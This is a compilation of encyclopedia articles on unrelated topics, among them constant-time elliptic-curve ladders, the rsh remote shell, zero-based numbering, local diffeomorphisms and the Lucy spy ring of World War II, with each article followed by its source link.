Rust code for Montgomery Ladder:[6]
The security of a cryptographic implementation is likely to face the threat of the so calledtiming attackswhich exploits the data-dependent timing characteristics of the implementation. Machines running cryptographic
implementations consume variable amounts of time to process different inputs and so the timings
vary based on the encryption key. To resolve this issue, cryptographic algorithms are implemented
in a way which removes data dependent variable timing characteristic from the implementation leading
to the so called constant-time implementations. Software implementations are considered to be constant-time in the
following sense as stated in:[7]“avoids all input-dependent branches, all input-dependent arrayindices, and other instructions with input-dependent timings.” The GitHub page[8]lists coding rules
for implementations of cryptographic operations, and more generally for operations involving secret or
sensitive values.
The Montgomery ladder is anx{\displaystyle x}-coordinate only algorithm for elliptic curve point multiplication
and is based on the double and add rules over a specific set of curves known asMontgomery curve. The algorithm has a conditional branching
such that the condition depends on a secret bit. So a straightforward implementation of the ladder won't be
constant time and has the potential to leak the secret bit. This problem has been addressed in literature[9][10]and several constant time implementations are known. The constant time Montgomery ladder algorithm is as given below which uses two functions CSwap and Ladder-Step. In the return value of the algorithm Z2p-2is the value of Z2−1computed using theFermat's little theorem.
The Ladder-Step function (given below) used within the ladder is the core of the algorithm and is a combined form of the differential add and doubling operations. The field
constant a24is defined as a24=(A+2)/4{\displaystyle (A+2)/4}, whereA{\displaystyle A}is a parameter of the underlyingMontgomery curve.
The CSwap function manages the conditional branching and helps the ladder to run following the requirements of a constant time implementation. The function swaps the pair of field elements⟨{\displaystyle \langle }X2,Z2⟩{\displaystyle \rangle }and⟨{\displaystyle \langle }X3,Z3⟩{\displaystyle \rangle }only ifb{\displaystyle b}= 1 and
this is done without leaking any information about the secret bit. Various methods of implementing CSwap have been proposed in literature.[9][10]A lesser costly option to manage the constant time requirement of the Montgomery ladder is conditional select which is formalised through a function CSelect. This function has been used in various optimisations and has been formally discussed in[11]
Since the inception of the standard Montgomery curveCurve25519at 128-bit security level, there has been various software implementations to compute the ECDH on various architectures and to achieve best possible performance cryptographic developers have resorted to write the implementations using assembly language of the underlying architecture. The work[12]provided a couple of 64-bit assembly implementations targeting the AMD64 architecture. The implementations were developed using a tool known asqhasm[13]which can generate high-speed assembly language cryptographic programs. It is to be noted that the function CSwap was used in the implementations of these ladders. After that there has been several attempts to optimise the ladder implementation through hand-written assembly programs out of which the notion of CSelect was first used in[14]and then in.[15]Apart from using sequential instructions, vector instructions have also been used to optimise the ladder computation through various works.[16][17][18][19]Along with AMD64, attempts have also been made to achieve efficient implementations on other architectures like ARM. The works[20]and[21]provides efficient implementations targeting the ARM architecture. The libraries lib25519[22]and[23]are two state-of-art libraries containing efficient implementations of the Montgomery ladder forCurve25519. Nevertheless, the libraries have implementations of other cryptographic primitives as well.
Apart fromCurve25519, there have been several attempts to compute the ladder over other curves at various security levels. Efficient implementations of the ladder over the standard curveCurve448at 224-bit security level have also been studied in literature.[14][17][19]A curve named Curve41417 providing security just over 200 bits was proposed[24]in which a variant of Karatsuba strategy was used to implement the field multiplication needed for the related ECC software. In pursuit of searching Montgomery curves that are competitive toCurve25519andCurve448research has been done and couple of curves were proposed along with efficient sequential[15]and vectorised implementations[19]of the corresponding ladders. At 256-bit security level efficient implementations of the ladder have also been addressed through three different Montgomery curves.[25]
|
https://en.wikipedia.org/wiki/Elliptic_curve_point_multiplication
|
Incomputer programming, awild branchis aGOTOinstruction where the target address is indeterminate, random or otherwise unintended.[1]It is usually the result of asoftware bugcausing the accidental corruption of apointerorarray index. It is "wild" in the sense that it cannot be predicted to behave consistently. In other words, a wild branch is a function pointer that is wild (dangling).
Detection of wild branches is frequently difficult; they are normally identified by erroneous results (where the unintended target address is nevertheless a valid instruction enabling the program to continue despite the error) or ahardware interrupt, which may change depending uponregistercontents.Debuggersand monitor programs such asInstruction set simulatorscan sometimes be used to determine the location of the original wild branch.
Thisprogramming-language-related article is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Wild_branch
|
Theremote shell(rsh) is acommand-linecomputer programthat can executeshell commandsas anotheruser, and on another computer across acomputer network.
The remote system to whichrshconnects runs thershdaemon(rshd). The daemon typically uses thewell-knownTransmission Control Protocol(TCP)port number513.
Rshoriginated as part of theBSD Unixoperating system, along withrcp, as part of therloginpackage on 4.2BSD in 1983. rsh has since been ported to other operating systems.
Thershcommand has the same name as another common UNIX utility, therestricted shell, which first appeared inPWB/UNIX; inSystem V Release 4, the restricted shell is often located at/usr/bin/rsh.
As otherBerkeley r-commandswhich involve user authentication, the rshprotocolis notsecurefor network use, because it sendsunencrypted informationover the network, among other reasons. Some implementations alsoauthenticateby sending unencryptedpasswordsover the network. rsh has largely been replaced with thesecure shell(ssh) program, even on local networks.[1][2]
As an example of rsh use, the following executes the commandmkdir testdiras userremoteuseron the computerhost.example.comrunning a UNIX-like system:
After the command has finished rsh terminates. If no command is specified then rsh will log in on the remote system usingrlogin. The network location of the remote computer is looked up using theDomain Name System.
Command to install rsh client using apt
A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed).[3]In the first case remote shell will be called bind shell, in the second case - reverse shell.[4]
Reverse shell can be used when the device on which the command is to be executed is not directly accessible - for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:[5]
It opens a TCP socket to attacker IP at port 80 as afile descriptor. It then repeatedly read lines from the socket and run the line, piping bothstdout and stderrback to the socket. In other words, it gives the attacker a remote shell on the machine.
|
https://en.wikipedia.org/wiki/Remote_Shell
|
Adaptive partition schedulersare a relatively new type of partition scheduler, which in turn is a kind ofscheduling algorithm, pioneered with the most recent version of theQNXoperating system. Adaptive partitioning, or AP, allows the real-time system designer to request that a percentage of processing resources be reserved for a particular partition (group of threads and/or processes making up asubsystem). The operating system'spriority-driven pre-emptive schedulerwill behave in the same way that a non-AP system would until the system is overloaded (i.e. system-wide there is more computation to perform than the processor is capable of sustaining over the long term). During overload, the AP scheduler enforces hard limits on total run-time for the subsystems within a partition, as dictated by the allocated percentage of processor bandwidth for the particular partition.
If the system is not overloaded, a partition that is allocated (for example) 10% of the processor bandwidth, can, in fact, use more than 10%, as it will borrow from the spare budget of other partitions (but will be required to pay it back later). This is very useful for the non real-time subsystems that experience variable load, since these subsystems can make use of spare budget fromhard real-timepartitions in order to make more forward progress than they would in afixed partition schedulersuch asARINC-653Archived2008-12-28 at theWayback Machine, but without impacting the hard real-time subsystems' deadlines.
QNX Neutrino 6.3.2 and newer versions have this feature.
ThisUnix-related article is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Adaptive_partition_scheduler
|
Zero-based numberingis a way ofnumberingin which the initial element of asequenceis assigned theindex0, rather than the index 1 as is typical in everyday non-mathematical or non-programming circumstances. Under zero-based numbering, the initial element is sometimes termed thezerothelement,[1]rather than thefirstelement;zerothis acoinedordinal numbercorresponding to the numberzero. In some cases, an object or value that does not (originally) belong to a given sequence, but which could be naturally placed before its initial element, may be termed the zeroth element. There is no wide agreement regarding the correctness of using zero as an ordinal (nor regarding the use of the termzeroth), as it creates ambiguity for all subsequent elements of the sequence when lacking context.
Numbering sequences starting at 0 is quite common in mathematics notation, in particular incombinatorics, though programming languages for mathematics usually index from 1.[2][3][4]Incomputer science,arrayindices usually start at 0 in modern programming languages, so computer programmers might usezerothin situations where others might usefirst, and so forth. In some mathematical contexts, zero-based numbering can be used without confusion, when ordinal forms have well established meaning with an obvious candidate to come beforefirst; for instance, azeroth derivativeof a function is the function itself, obtained bydifferentiatingzero times. Such usage corresponds to naming an element not properly belonging to the sequence but preceding it: the zeroth derivative is not really a derivative at all. However, just as thefirst derivativeprecedes thesecond derivative, so also does thezeroth derivative(or the original function itself) precede thefirst derivative.
Martin Richards, creator of theBCPLlanguage (a precursor ofC), designed arrays initiating at 0 as the natural position to start accessing the array contents in the language, since the value of apointerpused as an address accesses the positionp+ 0in memory.[5][6]BCPL was first compiled for theIBM 7094; the language introduced norun-timeindirection lookups, so the indirection optimization provided by these arrays was done at compile time.[6]The optimization was nevertheless important.[6][7]
In 1982Edsger W. Dijkstrain his pertinent noteWhy numbering should start at zero[8]argued that arrays subscripts should start at zero as the latter being the mostnatural number. Discussing possible designs of array ranges by enclosing them in a chained inequality, combining sharp and standard inequalities to four possibilities, demonstrating that to his conviction zero-based arrays are best represented by non-overlapping index ranges, which start at zero, alluding toopen, half-open and closed intervalsas with the real numbers. Dijkstra's criteria for preferring this convention are in detail that it represents empty sequences in a more natural way(a≤i<a?)than closed "intervals" (a≤i≤ (a− 1) ?), and that with half-open "intervals" of naturals, the length of a sub-sequence equals the upper minus the lower bound (a≤i<bgives(b−a)possible values fori, witha,b,iall integers).
This usage follows from design choices embedded in many influentialprogramming languages, includingC,Java, andLisp. In these three, sequence types (C arrays, Java arrays and lists, and Lisp lists and vectors) are indexed beginning with the zero subscript. Particularly in C, where arrays are closely tied topointerarithmetic, this makes for a simpler implementation: the subscript refers to an offset from the starting position of an array, so the first element has an offset of zero.
Referencing memory by an address and an offset is represented directly incomputer hardwareon virtually all computer architectures, so this design detail in C makes compilation easier, at the cost of some human factors. In this context using "zeroth" as an ordinal is not strictly correct, but a widespread habit in this profession. Other programming languages, such asFortranorCOBOL, have array subscripts starting with one, because they were meant ashigh-level programming languages, and as such they had to have a correspondence to the usualordinal numberswhich predate theinvention of the zeroby a long time.
Pascalallows the range of an array to be of any ordinal type (including enumerated types).APLallows setting the index origin to 0 or 1 during runtime programmatically.[9][10]Some recent languages, such asLuaandVisual Basic, have adopted the same convention for the same reason.
Zero is the lowest unsigned integer value, one of the most fundamental types in programming and hardware design. In computer science,zerois thus often used as the base case for many kinds of numericalrecursion. Proofs and other sorts of mathematical reasoning in computer science often begin with zero. For these reasons, in computer science it is not unusual to number from zero rather than one.
If an array is used to represent a cycle, it is convenient to obtain the index with amodulo function, which can result in zero.
With zero-based numbering, a range can be expressed as the half-openinterval,[0,n), as opposed to the closed interval,[1,n]. Empty ranges, which often occur in algorithms, are tricky to express with a closed interval without resorting to obtuse conventions like[1, 0]. Because of this property, zero-based indexing potentially reducesoff-by-oneandfencepost errors.[8]On the other hand, the repeat countnis calculated in advance, making the use of counting from 0 ton− 1(inclusive) less intuitive. Some authors prefer one-based indexing, as it corresponds more closely to how entities are indexed in other contexts.[11]
Another property of this convention is in the use ofmodular arithmeticas implemented in modern computers. Usually, themodulo functionmaps any integer moduloNto one of the numbers0, 1, 2, ...,N− 1, whereN≥ 1. Because of this, many formulas in algorithms (such as that for calculating hash table indices) can be elegantly expressed in code using the modulo operation when array indices start at zero.
Pointer operations can also be expressed more elegantly on a zero-based index due to the underlying address/offset logic mentioned above. To illustrate, supposeais thememory addressof the first element of an array, andiis the index of the desired element. To compute the address of the desired element, if the index numbers count from 1, the desired address is computed by this expression:
wheresis the size of each element. In contrast, if the index numbers count from 0, the expression becomes
This simpler expression is more efficient to compute atrun time.
However, a language wishing to index arrays from 1 could adopt the convention that every array address is represented bya′ =a–s; that is, rather than using the address of the first array element, such a language would use the address of a fictitious element located immediately before the first actual element. The indexing expression for a 1-based index would then be
Hence, the efficiency benefit at run time of zero-based indexing is not inherent, but is an artifact of the decision to represent an array with the address of its first element rather than the address of the fictitious zeroth element. However, the address of that fictitious element could very well be the address of some other item in memory not related to the array.
Superficially, the fictitious element doesn't scale well to multidimensional arrays. Indexing multidimensional arrays from zero makes a naive (contiguous) conversion to a linear address space (systematically varying one index after the other) look simpler than when indexing from one. For instance, when mapping the three-dimensional arrayA[P][N][M]to a linear arrayL[M⋅N⋅P], both withM ⋅ N ⋅ Pelements, the indexrin the linear array to access a specific element withL[r] = A[z][y][x]in zero-based indexing, i.e.[0 ≤x<P],[0 ≤y<N],[0 ≤z<M], and[0 ≤r<M ⋅ N ⋅ P], is calculated by
Organizing all arrays with 1-based indices ([1 ≤x′≤P],[1 ≤y′≤N],[1 ≤z′≤M],[1 ≤r′≤M ⋅ N ⋅ P]), and assuming an analogous arrangement of the elements, gives
to access the same element, which arguably looks more complicated. Of course,r′ =r+ 1,since[z=z′ – 1],[y=y′ – 1],and[x=x′ – 1].A simple and everyday-life example ispositional notation, which the invention of the zero made possible. In positional notation, tens, hundreds, thousands and all other digits start with zero, only units start at one.[12]
This situation can lead to some confusion in terminology. In a zero-based indexing scheme, the first element is "element number zero"; likewise, the twelfth element is "element number eleven". Therefore, an analogy from the ordinal numbers to the quantity of objects numbered appears; the highest index ofnobjects will ben− 1, and it refers to thenth element. For this reason, the first element is sometimes referred to as thezerothelement, in an attempt to avoid confusion.
Inmathematics, many sequences of numbers or ofpolynomialsare indexed by nonnegative integers, for example, theBernoulli numbersand theBell numbers.
In bothmechanicsandstatistics, the zerothmomentis defined, representing total mass in the case of physicaldensity, or total probability, i.e. one, for aprobability distribution.
Thezeroth law of thermodynamicswas formulated after the first, second, and third laws, but considered more fundamental, thus its name.
In biology, an organism is said to have zero-order intentionality if it shows "no intention of anything at all". This would include a situation where the organism's genetically predetermined phenotype results in a fitness benefit to itself, because it did not "intend" to express its genes.[13]In the similar sense, a computer may be considered from this perspective a zero-order intentional entity, as it does not "intend" to express the code of the programs it runs.[14]
In biological or medical experiments, the first day of an experiment is often numbered as day 0.[15]
Patient zero (orindex case) is the initialpatientin thepopulation sampleof anepidemiologicalinvestigation.
Theyear zerodoes not exist in the widely usedGregorian calendaror in its predecessor, theJulian calendar. Under those systems, the year1 BCis followed byAD 1. However, there is a year zero inastronomical year numbering(where it coincides with the Julian year 1 BC) and inISO 8601:2004(where it coincides with the Gregorian year 1 BC), as well as in allBuddhistandHindu calendars.
In many countries, theground floorin buildings is considered as floor number 0 rather than as the "1st floor", the naming convention usually found in the United States of America. This makes a consistent set with underground floors marked with negative numbers.
While the ordinal of 0 mostly finds use in communities directly connected to mathematics, physics, and computer science, there are also instances in classical music. The composerAnton Brucknerregarded his earlySymphony in D minorto be unworthy of including in the canon of his works, and he wrotegilt nicht("doesn't count") on the score and a circle with a crossbar, intending it to mean "invalid". But posthumously, this work came to be known asSymphony No. 0 in D minor, even though it was actually written afterSymphony No. 1 in C minor. There is an even earlierSymphony in F minorof Bruckner's, which is sometimes calledNo. 00. The Russian composerAlfred Schnittkealso wrote aSymphony No. 0.
In some universities, including Oxford and Cambridge, "week 0" or occasionally "noughth week" refers to the week before the first week of lectures in a term. In Australia, some universities refer to this as "O week", which serves as a pun on "orientation week". As a parallel, the introductory weeks at university educations inSwedenare generally callednollning(zeroing).
TheUnited States Air Forcestarts basic training each Wednesday, and the first week (of eight) is considered to begin with the following Sunday. The four days before that Sunday are often referred to as "zero week".
24-hour clocksand the international standardISO 8601use 0 to denote the first (zeroth) hour of the day, consistent with using the 0 to denote the first (zeroth) minute of the hour and the first (zeroth) second of the minute. Also, the12-hour clocksused inJapanuse 0 to denote the hour immediately after midnight and noon in contrast to 12 used elsewhere, in order to avoid confusionwhether 12 a.m. and 12 p.m. represent noon or midnight.
Robert Crumb's drawings for the first issue ofZap Comixwere stolen, so he drew a whole new issue, which was published as issue 1. Later he re-inked his photocopies of the stolen artwork and published it as issue 0.
TheBrussels ringroad in Belgium is numbered R0. It was built after the ring road aroundAntwerp, but Brussels (being the capital city) was deemed deserving of a more basic number. Similarly the (unfinished) orbital motorway aroundBudapestin Hungary is calledM0.
Zero is sometimes usedin street addresses, especially in schemes where even numbers are one side of the street and odd numbers on the other. A case in point isChrist ChurchonHarvard Square, whose address is 0 Garden Street.
Formerly inFormula One, when a defending world champion did not compete in the following season, the number 1 was not assigned to any driver, but one driver of the world champion team would carry the number 0, and the other, number 2. This did happen both in 1993 and 1994 withDamon Hillcarrying the number 0 in both seasons, as defending championNigel Mansellquit after 1992, and defending championAlain Prostquit after 1993. However, in 2014 the series moved to drivers carrying career-long personalised numbers, instead of team-allocated numbers, other than the defending champion still having the option to carry number 1. Therefore 0 is no longer used in this scenario. It is not clear if it is available as a driver's chosen number, or whether they must be between 2 and 99, but it has not been used to date under this system.
Some team sports allow 0 to be chosen as a player'suniform number(in addition to the typical range of 1-99). The NFL voted to allow this from 2023 onwards.
A chronological prequel of a series may be numbered as 0, such asRing 0: BirthdayorZork Zero.
TheSwiss Federal Railwaysnumber certain classes of rolling stock from zero, for example,Re 460000 to 118.
In the realm of fiction,Isaac Asimoveventually added a Zeroth Law to hisThree Laws of Robotics, essentially making them four laws.
A standardroulettewheel contains the number 0 as well as 1-36. It appears in green, so is classed as neither a "red" nor "black" number for betting purposes. The card gameUnohas number cards running from 0 to 9 along with special cards, within each coloured suit.
TheFour Essential Freedoms of Free Softwareare numbered starting from zero. This is for historical reasons: the list originally had only three freedoms, and when the fourth was added it was placed in the zeroth position as it was considered more basic.
|
https://en.wikipedia.org/wiki/Zero-based_numbering
|
Ariadne's thread, named for the legend ofAriadne, is solving a problem which has multiple apparent ways to proceed—such as a physicalmaze, alogic puzzle, or anethical dilemma—through an exhaustive application of logic to all available routes. It is the particular method used that is able to follow completely through to trace steps or take point by point a series of found truths in a contingent, ordered search that reaches an end position. This process can take the form of a mental record, a physical marking, or even a philosophical debate; it is the process itself that assumes the name.
The key element to applying Ariadne's thread to a problem is the creation and maintenance of a record—physical or otherwise—of the problem's available and exhausted options at all times. This record is referred to as the "thread", regardless of its actual medium. The purpose the record serves is to permitbacktracking—that is, reversing earlier decisions and trying alternatives. Given the record, applying thealgorithmis straightforward:
This algorithm will terminate upon either finding a solution or marking all initial choices as failures; in the latter case, there is no solution. If a thorough examination is desired even though a solution has been found, one can revert to the previous decision, mark the success, and continue on as if a solution were never found; the algorithm will exhaust all decisions and find all solutions.
The terms "Ariadne's thread" and "trial and error" are often used interchangeably, which is not necessarily correct. They have two distinctive differences:
In short, trial and errorapproachesa desired solution; Ariadne's thread blindly exhausts the search space completely, finding any and all solutions. Each has its appropriate distinct uses. They can be employed in tandem—for example, although the editing of a Wikipedia article is arguably a trial-and-error process (given how in theory it approaches an ideal state), article histories provide the record for which Ariadne's thread may be applied, reverting detrimental edits and restoring the article back to the most recent error-free version, from which other options may be attempted.
Obviously, Ariadne's thread may be applied to the solving of mazes in the same manner as the legend; an actual thread can be used as the record, or chalk or a similar marker can be applied to label passages. If the maze is on paper, the thread may well be a pencil.
Logic problems of all natures may be resolved via Ariadne's thread, the maze being but an example. At present, it is most prominently applied toSudokupuzzles, used to attempt values for as-yet-unsolved cells. The medium of the thread for puzzle-solving can vary widely, from a pencil to numbered chits to a computer program, but all accomplish the same task. Note that as the compilation of Ariadne's thread is aninductiveprocess, and due to its exhaustiveness leaves no room for actual study, it is largely frowned upon as a solving method, to be employed only as a last resort whendeductivemethods fail.
Artificial intelligence is heavily dependent upon Ariadne's thread when it comes to game-playing, most notably in programs which playchess; the possible moves are the decisions, game-winning states the solutions, and game-losing states failures. Due to the massive depth of many games, most algorithms cannot afford to apply Ariadne's threadentirelyon every move due to time constraints, and therefore work in tandem with aheuristicthat evaluates game states and limits abreadth-first searchonly to those that are most likely to be beneficial, a trial-and-error process.
Even circumstances where the concept of "solution" is not so well defined have had Ariadne's thread applied to them, such as navigating theWorld Wide Web, making sense of patent law, and in philosophy; "Ariadne's Thread" is a popular name for websites of many purposes, but primarily for those that feature philosophical or ethical debate.
|
https://en.wikipedia.org/wiki/Ariadne%27s_thread_(logic)
|
Inmathematics, more specificallydifferential topology, alocal diffeomorphismis intuitively amapbetweensmooth manifoldsthat preserves the localdifferentiable structure. The formal definition of a local diffeomorphism is given below.
LetX{\displaystyle X}andY{\displaystyle Y}bedifferentiable manifolds. Afunctionf:X→Y{\displaystyle f:X\to Y}is alocal diffeomorphismif, for each pointx∈X{\displaystyle x\in X}, there exists anopen setU{\displaystyle U}containingx{\displaystyle x}such that theimagef(U){\displaystyle f(U)}is open inY{\displaystyle Y}andf|U:U→f(U){\displaystyle f\vert _{U}:U\to f(U)}is adiffeomorphism.
A local diffeomorphism is a special case of animmersionf:X→Y{\displaystyle f:X\to Y}. In this case, for eachx∈X{\displaystyle x\in X}, there exists an open setU{\displaystyle U}containingx{\displaystyle x}such that the imagef(U){\displaystyle f(U)}is anembedded submanifold, andf|U:U→f(U){\displaystyle f|_{U}:U\to f(U)}is a diffeomorphism. HereX{\displaystyle X}andf(U){\displaystyle f(U)}have the same dimension, which may be less than the dimension ofY{\displaystyle Y}.[1]
A map is a local diffeomorphism if and only if it is a smoothimmersion(smooth local embedding) and anopen map.
Theinverse function theoremimplies that a smooth mapf:X→Y{\displaystyle f:X\to Y}is a local diffeomorphism if and only if thederivativeDfx:TxX→Tf(x)Y{\displaystyle Df_{x}:T_{x}X\to T_{f(x)}Y}is alinear isomorphismfor all pointsx∈X{\displaystyle x\in X}. This implies thatX{\displaystyle X}andY{\displaystyle Y}have the same dimension.[2]
It follows that a mapf:X→Y{\displaystyle f:X\to Y}between two manifolds of equal dimension (dimX=dimY{\displaystyle \operatorname {dim} X=\operatorname {dim} Y}) is a local diffeomorphism if and only if it is a smoothimmersion(smooth local embedding), or equivalently, if and only if it is a smoothsubmersion. This is because, for anyx∈X{\displaystyle x\in X}, bothTxX{\displaystyle T_{x}X}andTf(x)Y{\displaystyle T_{f(x)}Y}have the same dimension, thusDfx{\displaystyle Df_{x}}is a linear isomorphism if and only if it is injective, or equivalently, if and only if it is surjective.[3]
Here is an alternative argument for the case of an immersion: every smooth immersion is alocally injective function, whileinvariance of domainguarantees that any continuous injective function between manifolds of equal dimensions is necessarily an open map.
All manifolds of the same dimension are "locally diffeomorphic," in the following sense: ifX{\displaystyle X}andY{\displaystyle Y}have the same dimension, andx∈X{\displaystyle x\in X}andy∈Y{\displaystyle y\in Y}, then there exist open neighbourhoodsU{\displaystyle U}ofx{\displaystyle x}andV{\displaystyle V}ofy{\displaystyle y}and a diffeomorphismf:U→V{\displaystyle f:U\to V}. However, this mapf{\displaystyle f}need not extend to a smooth map defined on all ofX{\displaystyle X}, let alone extend to a local diffeomorphism. Thus the existence of a local diffeomorphismf:X→Y{\displaystyle f:X\to Y}is a stronger condition than "to be locally diffeomophic." Indeed, although locally-defined diffeomorphisms preserve differentiable structure locally, one must be able to "patch up" these (local) diffeomorphisms to ensure that the domain is the entire smooth manifold.
For example, one can impose two differentdifferentiable structuresonR4{\displaystyle \mathbb {R} ^{4}}that each makeR4{\displaystyle \mathbb {R} ^{4}}into a differentiable manifold, but both structures are not locally diffeomorphic (seeExoticR4{\displaystyle \mathbb {R} ^{4}}).[citation needed]
As another example, there can be no local diffeomorphism from the2-spheretoEuclidean 2-space, although they do indeed have the same local differentiable structure. This is because all local diffeomorphisms arecontinuous, the continuous image of acompact spaceis compact, and the 2-sphere is compact whereas Euclidean 2-space is not.
If a local diffeomorphism between two manifolds exists then their dimensions must be equal.
Every local diffeomorphism is also alocal homeomorphismand therefore alocally injectiveopen map.
A local diffeomorphism has constantrankofn.{\displaystyle n.}
|
https://en.wikipedia.org/wiki/Local_diffeomorphism
|
Opportunity-Driven Multiple Access (ODMA)is aUMTScommunications relaying protocol standard first introduced by the European Telecommunication Standards Institute (ETSI) in 1996. ODMA has been adopted by the 3rd-Generation Partnership Project,3GPPto improve the efficiency of UMTS networks using theTDDmode. One of the objectives of ODMA is to enhance the capacity and the coverage of radio transmissions towards the boundaries of the cell. While mobile stations under the cell coverage area can communicate directly with the base station, mobile stations outside the cell boundary can still access the network and communicating with the base station viamultihoptransmission. Mobile stations with high data rate inside the cell are used as multihop relays.
The initial concept of Opportunity Driven Multiple Access (ODMA) was conceived and patented in South Africa by David Larsen and James Larsen of SRD Pty Ltd in 1978[1]
The ODMA standard was tabled by the 3GPP committee in 1999 due to complexity issues. The technology continues to be developed and enhanced by IWICS who holds the key patents describing the methods employed in ODMA to effect opportunity driven communications.
With the explosion of cellular phone use and Internet multi-media services, wireless networks are becoming increasingly congested. The increased demand has raised our expectations, while creating capacity problems and a need for greater bandwidth. However, if the transmitted power of wireless units is significantly reduced, then there is a potential solution. This implies a signal-to-noise ratio improvement: the ratio is affected by numerous parameters, including radio frequency and path. Opportunity Driven Multiple Access (ODMA) continually determines optimal points along that path to support each transmission.
Adaptation
ODMA uses many adaptation techniques to optimize communications, but one of the most powerful is path diversity. From origin to destination, ODMA stations relay the transmissions in an intelligent and efficient manner.
The available optimal paths will increase as subscribers join the network, supporting a fundamental aspect of the ODMA philosophy: Communications are dynamic and local, best controlled at the station level, rather than from some centralized source. Each ODMA-network station is an intelligent burst-mode radio, which can use all the available bandwidth some of the time. However, as with any technology, weather or general network conditions can affect transmissions.
Like cellular networks, the ODMA-network stations operate in the same wide frequency band, but frequency hopping, at lower data rates, introduces sub-bands. Because transmission is packet based and connectionless, stations relay packets from neighbor stations. For each packet, a station optimizes the transmission by adapting the route, power, data rate, packet length, frequency, time window and data quality over a wide range. Each station has responsibility and much autonomy for routing and service-enhancing adaptation to the current environment. For security, stations accept the authority of a network supervisor.
|
https://en.wikipedia.org/wiki/Opportunity-Driven_Multiple_Access
|
TheLucy spy ring(German:Lucy-Spionagering) was an anti-NaziWorld War IIespionageoperation headquartered inSwitzerlandand run byRudolf Roessler, aGermanrefugee. Its story was only published in 1966, and very little is clear about the ring, Roessler, or the effort's sources or motives.
At the outbreak of World War II, Roessler was a politicalrefugeefrom Bavaria who had fled to Switzerland when Hitler came to power. He was the founder of a small publishing firm,Vita NovaVerlag, producing copies of anti-NaziExilliteraturand other literary works in theGerman languagestrictly banned undercensorship in Nazi Germany, forsmugglingacross the border andblack marketdistribution todissidentintellectuals. He was employed by Brigadier Masson, head of Swiss Military Intelligence, who employed him as an analyst withBureau Ha, overtly a press cuttings agency but in fact a covert department of Swiss Intelligence. Roessler was approached by two German officers,Fritz ThieleandRudolph von Gersdorff, who were part of aGerman resistanceconspiracy to overthrowHitler, and had been known to Roessler in the 1930s through theHerrenklub.[clarification needed]
Thiele and Gersdorf wished him to act as a conduit for high-level military information, to be made available to him to make use of in the fight against Nazism. This they accomplished by equipping Roessler with a radio and anEnigma machine, and designating him as a German military station (call-signed RAHS). In this way they could openly transmit their information to him through normal channels. They were able to do this as Thiele, and his superior,Erich Fellgiebel(who was also part of the conspiracy), were in charge of theGerman Defence Ministry'scommunication centre, theBendlerblock. This was possible, as those employed to encode the information were unaware of where it was going, while those transmitting the messages had no idea what was in them.
At first Roessler passed the information toSwiss military intelligence, via a friend who was serving in Bureau Ha, an intelligence agency used by the Swiss as acut-out.Roger Masson, the head of Swiss MI, also chose to pass some of this information to the BritishSIS. Later, seeking to aid the USSR in its role in the fight against Nazism, Roessler was able to pass on information to it via another contact who was a part of a Soviet (GRU) network run byAlexander Rado. Roessler was not a Communist, nor even a Communist sympathizer until much later, and wished to remain at arm's length from Rado's network, insisting on complete anonymity and communicating with Rado only through the courier,Christian Schneider. Rado agreed to this, recognizing the value of the information being received. Rado code-named the source "Lucy", simply because all he knew about the source was that it was inLucerne.
Roessler's first major contribution to Soviet intelligence came in May 1941 when he was able to deliver details ofOperation Barbarossa, Germany's impending invasion of the Soviet Union. Though his warning was initially ignored - as Soviet intelligence had received multiple false alarms about an impending German invasion - Roessler's dates eventually proved accurate. Following the invasion, in June 1941, Lucy was regarded as a VYRDO source,i.e.of the highest importance, and to be transmitted immediately. Over the next two years "Lucy" was able to supply the Soviets with high grade military intelligence. During the autumn of 1942, "Lucy" provided the Soviets with detailed information aboutCase Blue, the German operations againstStalingradand theCaucasus; during this period decisions taken in Berlin were arriving in Moscow on average within a ten-hour period; on one occasion in just six hours, not much longer than it took to reach German front line units. Roessler, and Rado's network, particularlyAllan Foote, Rado's main radio operator, were prepared to work flat out to maintain the speed and flow of the information. At the peak of its operation, Rado's network was enciphering and sending several hundred messages per month, many of these from "Lucy". Meanwhile, Roessler alone had to do all the receiving, decoding and evaluating of the "Lucy" messages before passing them on; for him during this period it became a full-time operation. In the summer of 1943, the culmination of "Lucy's" success came in transmitting the details of Germany's plans forOperation Citadel, a planned summer offensive against theKursk salient, which became a strategic defeat for the German army—theBattle of Kurskgave theRed Armythe initiative on the eastern front for the remainder of the war.
During the winter of 1942, the Germans became aware of the transmissions from the Rado network, and began to take steps against it through their counter-espionage bureau. After several attempts to penetrate the network they succeeded in pressuring the Swiss to close it down in October 1943, when its radio transmitters were closed down and a number of key operatives were arrested. Thereafter Roessler's only outlet for the "Lucy" information was through the Bureau Ha and Swiss Military Intelligence. Roessler was unaware his information was also going to theWestern Allies.
The Lucy spy ring came to an end in the summer of 1944 when the German members, who were also involved in other anti-Nazi activities, were arrested in the aftermath of the failed20 July plot.
In Switzerland the Lucy network consisted of the following members:
The record of messages transmitted show that Roessler had four important sources, codenamedWerther,Teddy,Olga, andAnna.[1]While it was never discovered who they were,[1]the quartet was responsible for 42.5 percent of the intelligence sent from Switzerland to the Soviet Union.[1]
The search for the identity of those sources has created a very large body of work of varying quality and offering various conclusions.[2]Several theories can be dismissed immediately, including by Foote and several other writers, that the code names reflected the sources' access type rather than their identity- for example, that Werther stood for Wehrmacht, Olga for Oberkommando der Luftwaffe, Anna for Auswärtiges Amt (Foreign Office)- as the evidence does not support it.[1]Alexander Radó made this claim in his memoirs, that were examined in aDer Spiegelarticle.[3]Three and a half years before his death, Roessler described the identity of the four sources to a confidant.[1]They were a German major who was in charge of the Abwehr beforeWilhelm Canaris, Hans Bernd Gisevius, Carl Goerdeler and a General Boelitz, who was then deceased.[1]
The most reliable study by the CIA Historical Review Program[1]concluded that of the four sources, the most important source wasWerther. The study stated he was likelyWehrmachtGeneralHans Oster, other Abwehr officers working with Swiss intelligence, or Swiss intelligence on its own.[4][1]There was no evidence to link the other three codenames to known individuals.[1]The CIA believed that the German sources gave their reports to Swiss General Staff, who in turn supplied Roessler with information that the Swiss wanted to pass to the Soviets.[5]
